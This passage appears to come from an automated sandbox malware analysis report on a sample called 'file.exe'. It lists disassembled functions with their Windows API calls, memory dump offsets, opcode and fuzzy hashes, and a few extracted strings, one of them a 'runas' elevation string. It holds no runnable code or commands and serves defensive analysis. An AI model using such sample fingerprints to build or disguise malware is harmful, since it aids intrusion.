                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043352D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: b333cc5f23de22d3145c9e3758e484d235afa0bb9630b9fa484c080b45391314
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: CF012636700514B7CF16EE5AC842EAF77A99F58364F00001BFC12EB382DA75EE01C2A5
                    Function 044FBA53 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,044FBBB8,00000000,?,045022B2,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 044FBA69
                    • GetLastError.KERNEL32(?,045022B2,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,044FBBB8,00000000,00000104,?), ref: 044FBA73
                    • __dosmaperr.LIBCMT ref: 044FBA7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: 0872bd1eb4e1c359acb741f2f5640e437b6ddb4882e48a0fab2a2bada25a0c68
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: 62F06D32A00955BBDF205FA6DC08947FFA9FF453A17048526EA28C7521D731F851DBD0
                    Function 044FBABC Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,044FBBB8,00000000,?,0450223D,00000000,00000000,044FBBB8,?,?,00000000,00000000,00000001), ref: 044FBAD2
                    • GetLastError.KERNEL32(?,0450223D,00000000,00000000,044FBBB8,?,?,00000000,00000000,00000001,00000000,00000000,?,044FBBB8,00000000,00000104), ref: 044FBADC
                    • __dosmaperr.LIBCMT ref: 044FBAE3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 69f126d989a97fb211dce271b72d19190c4e2d2f65175cf5e02f866ed845707c
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 55F06D32600655BB9F201FA2DC0885BBF69FF463A17008126F618C7A24E731F951CBD0
                    Function 0043B7EC Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B802
                    • GetLastError.KERNEL32(?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104,?), ref: 0043B80C
                    • __dosmaperr.LIBCMT ref: 0043B813
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: eea697dc5ee5a63e9bb000b8ca0ecb04d52ee882e46ab181b6f30ec3310184b0
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: E4F08132600615BB8B252FA2DC08E5BBF6DFF483A0B109526F61CC7520D735E861CBD8
                    Function 0043B855 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001), ref: 0043B86B
                    • GetLastError.KERNEL32(?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104), ref: 0043B875
                    • __dosmaperr.LIBCMT ref: 0043B87C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 1fe541eff6bd0899817d30d0916f77e4946d01b6b56965e1649de8632fa44e19
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 44F08631600615BBDB256FB6DC04A47BF6DFF483A1B005526F618D7520D739E851C7D8
                    Function 044E537C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044E02DD: TlsGetValue.KERNEL32(?,?,044DF85E,044DF68B,?,?), ref: 044E02E3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 044E53A6
                      • Part of subcall function 044EE686: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044EE6AD
                      • Part of subcall function 044EE686: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044EE6C6
                      • Part of subcall function 044EE686: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EE73C
                      • Part of subcall function 044EE686: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044EE744
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 044E53B4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 044E53BE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 044E53C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: f53cc2dec393ab6833bd1fa1c95a3dba4dcb343eb51315b206e8ec6eedd54be4
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: 8BF0F631A00518B7EF25B767D81097EF7699F8065AB44012FE81193292EFB4BE1587C6
                    Function 00425115 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420076: TlsGetValue.KERNEL32(?,?,0041F5F7,0041F424,?,?), ref: 0042007C
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042513F
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E446
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E45F
                      • Part of subcall function 0042E41F: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E4D5
                      • Part of subcall function 0042E41F: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E4DD
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042514D
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425157
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425161
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: 3766eabf401ff52a77b5129f6dfad517b3767f028463115b44bbc9b501536ea0
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: E4F0F635B0093427CA25B667B812D6EB7659F90B14B84012FF51153292DF7C9E15C7CD
                    Function 044DC97B Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DFC88
                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 044DFCBB
                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 044DFCC7
                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 044DFCD0
                      • Part of subcall function 044DF664: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 044DF686
                      • Part of subcall function 044DF664: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044DF6A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
                    • String ID:
                    • API String ID: 2559503089-0
                    • Opcode ID: 8a788c5f9dfb7895deb3ccd31f8a7865abec001d3e2efdd0ea5cc74812fdcb80
                    • Instruction ID: 8f2dfaafecc44fca86f6204f18c6e28b3b45448d03a437a94245cc4e479e1d45
                    • Opcode Fuzzy Hash: 8a788c5f9dfb7895deb3ccd31f8a7865abec001d3e2efdd0ea5cc74812fdcb80
                    • Instruction Fuzzy Hash: E6F02471B00604A6AF34BFB6487066E32966F40B18F04413FA8035B381DFA0BE099391
                    Function 00429620 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429629
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042964D
                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429660
                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429669
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                    • String ID:
                    • API String ID: 218105897-0
                    • Opcode ID: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction ID: 93f89da88a0149968f4bc4dad75d0c9ef1f1bc6a703f7e560df40d29a4a9f6d4
                    • Opcode Fuzzy Hash: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction Fuzzy Hash: A5F0A070300A305EE661AA26A812F6E23D99F44758F40881FE45B87282CE2CEC43CB5D
                    Function 04506DD6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(044C89D7,0000000F,0045FBB0,00000000,044C89D7,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7), ref: 04506DED
                    • GetLastError.KERNEL32(?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000,044C89D7,?,045008F2,044C89D7), ref: 04506DF9
                      • Part of subcall function 04506DBF: CloseHandle.KERNEL32(00462970,04506E09,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000,044C89D7), ref: 04506DCF
                    • ___initconout.LIBCMT ref: 04506E09
                      • Part of subcall function 04506D81: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,04506DB0,045054AE,044C89D7,?,0450039E,00000000,?,044C89D7,00000000), ref: 04506D94
                    • WriteConsoleW.KERNEL32(044C89D7,0000000F,0045FBB0,00000000,?,045054C1,044C89D7,00000001,044C89D7,044C89D7,?,0450039E,00000000,?,044C89D7,00000000), ref: 04506E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 99305278c424cdc35b8aa41b48a886ede6525523877fbf832eab57dc6e04949c
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: AEF01C3A501215BBCF621FA5EC0898A3F26FB483A1F008121FA1C85160D672D820EB95
                    Function 00446B6F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,00408770,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770), ref: 00446B86
                    • GetLastError.KERNEL32(?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770,?,0044068B,00408770), ref: 00446B92
                      • Part of subcall function 00446B58: CloseHandle.KERNEL32(FFFFFFFE,00446BA2,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770), ref: 00446B68
                    • ___initconout.LIBCMT ref: 00446BA2
                      • Part of subcall function 00446B1A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446B49,00445247,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446B2D
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446BB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 62f88e2b5bb4a89209554c6b3be65d4fc596e2bd3b8c6ec97840f3fc23b8838f
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 7BF03736101274BBDF521F95DC0898A3F2AFB457A1F014062FD1CC5131D672DD209B99
                    Function 0041D2A9 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,0041D246,00000064), ref: 0041D2CC
                    • LeaveCriticalSection.KERNEL32(00465720,00468650,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2D6
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2E7
                    • EnterCriticalSection.KERNEL32(00465720,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2EE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: 1ac50c9b0066e0c4a2d53f3e21af84157b5af11804174151a578e244d4ee8ebf
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 6DE0ED35541B24E7CB112B94AC08A8E3B18EB09753F144072F9059656196B598419BDE
                    Function 044C7A87 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: 33b8619bdee661f72d9fcc56bf55e4648d4f5d1b7ff23d2d9bb236fc44975a22
                    • Instruction ID: e1cd46d9460709393e138addb45ef8657428fb9d11fc3e53b0804f23161cfa93
                    • Opcode Fuzzy Hash: 33b8619bdee661f72d9fcc56bf55e4648d4f5d1b7ff23d2d9bb236fc44975a22
                    • Instruction Fuzzy Hash: 3BE18E71A00144ABFF08EF78CD85BADBB72DF41318F14864EE4159B3C6DB75AA408B92
                    Function 00417220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0041744C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.@$@|A
                    • API String ID: 3366076730-1638491229
                    • Opcode ID: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction ID: 5e1297a57d6b7b639a8e02b3d6bde4c068ab49fd92cbbf4b728f3a3119506081
                    • Opcode Fuzzy Hash: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction Fuzzy Hash: 23A136B0A01619CFDB21CF69C98479EBBF0FF48714F18819AE819AB351E7799D41CB84
                    Function 044F9321 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: 3e269a77a7276cbc7ef3962883cf2a68c04f40bcce03bd6d1d710c4e2c29ebd5
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 2441A7B1A04614ABDF25DF9ADC81A9FBBB8EF88314F14406BE600D7251EB70AA40CB55
                    Function 004390BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: e36cff2137ef11141afc6ba0048b09c1a3638fd79f1bf7c1abf2875572eb59fc
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 4941D271A00215ABEF15DF9ADC859AFBBB8EB8D300F14106BE400A7351E7F88E41CB59
                    Function 00417A50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 508da38ff4ba26469217b6a2bf1b4c06ef4b1217051b4f1e4bbe8fea5b21e982
                    • Instruction ID: 190a37b34fbfeecb8fffc7a3455fb99a6090ca9c34ce7be73932cc516f32dd04
                    • Opcode Fuzzy Hash: 508da38ff4ba26469217b6a2bf1b4c06ef4b1217051b4f1e4bbe8fea5b21e982
                    • Instruction Fuzzy Hash: 0631F3B1A047009BD720DF68D845A9BB7F8EF14354F100A2FE946C3241E779FA94C3A9
                    Function 044FE7BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044FE563: GetOEMCP.KERNEL32(00000000,044FE7D5,?,?,044F78F5,044F78F5,?), ref: 044FE58E
                    • _free.LIBCMT ref: 044FE832
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction ID: b8fed7bb90a3c07e02fa0c0ca8109bf3afb2fe3a0e7bc7db6a6decd39c9c8c0f
                    • Opcode Fuzzy Hash: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction Fuzzy Hash: 9531AD71900649AFDF11EF69DC80A9F7BF4FF44315F6140ABEA109B2A1EB72A940CB51
                    Function 00403930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                    • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pB@
                    • API String ID: 3366076730-522444117
                    • Opcode ID: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction ID: 85cc1f21d270febbee68db5d29f907cdb29bffcc18a0c6cdd29de26c28620044
                    • Opcode Fuzzy Hash: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction Fuzzy Hash: C04127B46017058FD720CF29C988B5ABBF4FF44315F10861EE86A8B381E7B8A905CF80
                    Function 0041B6E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0041B76E
                    • RaiseException.KERNEL32(?,?,?,?), ref: 0041B793
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                      • Part of subcall function 00438C8F: IsProcessorFeaturePresent.KERNEL32(00000017,0043A7CD,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 00438CAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                    • String ID: csm
                    • API String ID: 1924019822-1018135373
                    • Opcode ID: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction ID: 279872545446a478c70440809aaa54d3911d66500b0e0947e58eeb54dd8337e2
                    • Opcode Fuzzy Hash: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction Fuzzy Hash: 7521B635D002189BCF24EFA5D945AEEB3B5EF84715F58401EE419AB290CB38AD85CBC5
                    Function 0043694B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
